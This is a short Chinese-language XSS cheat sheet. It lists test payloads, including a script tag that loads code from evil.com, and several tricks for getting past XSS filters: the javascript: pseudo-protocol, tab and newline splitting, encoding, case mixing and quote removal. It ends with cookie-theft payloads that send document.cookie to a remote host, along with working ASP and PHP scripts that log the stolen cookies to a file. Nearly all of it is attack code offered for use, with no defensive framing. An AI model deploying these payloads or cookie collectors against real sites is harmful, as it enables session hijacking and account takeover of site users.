XSS测试代码:
<img src="javascript:alert(/xss/)">
<script src=http://evil.com/xss.js></script>
</textarea><script>alert(/xss/)</script>
"><script>alert(/xss/)</script>
</script><script>alert(/xss/)</script>
绕过XSS-Filter
如果用户能随意插入<>标签,就有可能通过script标签任意插入恶意代码,如:
<script>alert(/xss/)</script>
因此,过滤的话,会优先考虑过滤<script>标签
一:利用HTML标签值执行XSS
javascript:[code]伪协议形式,需web浏览器支持,如IE6。如:
<img src="javascript:alert(/xss/)">
二:空格回车tab
当仅过滤javascript等关键字时,
利用tab进行绕过限制。
<img src="java script:alert(/xss/)"> (中间间隔为tab键)
利用回车键进行绕过限制。
<img src="javas
cript:alert(/xss/)">
三:对标签属性值进行转码
<img src="javascript:alert(/xss/)">转换为<img src="javascript:alert(/xss/)"> ASCII码转换
四:扰乱过滤规则
关键字大小写,
<img SRC="javascript:alert(/xss/)">
或
<imG Src="javascript:alert(/xss/)">
单引号
<img src='javascript:alert(/xss/)'>
不使用引号
<img src=javascript:alert(/xss/)>
及其/隔开
<img/src="javascript:alert(/xss/)">
cookie会话攻击原理剖析
获取cookie:
<script>document.location="http://www.test.com/cookie.asp?cookie='+document.cookie"</script>
<img src="http://www.test.com/cookie.asp?cookie='+document.cookie"></img>
远程服务器上接收cookie文件,代码如下:
ASP版本:
<%
msg=Request.ServerVariables("QUERY_STRING")
testfile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(""&msg& "")
thisfile.close
set fs =nothing
%>
PHP版本:
<?php
$cookie=$_GET['cookie'];
$log=fopen("cookie.txt","a");
fwrite($log,$cookie ." ");
fclose($log);
?>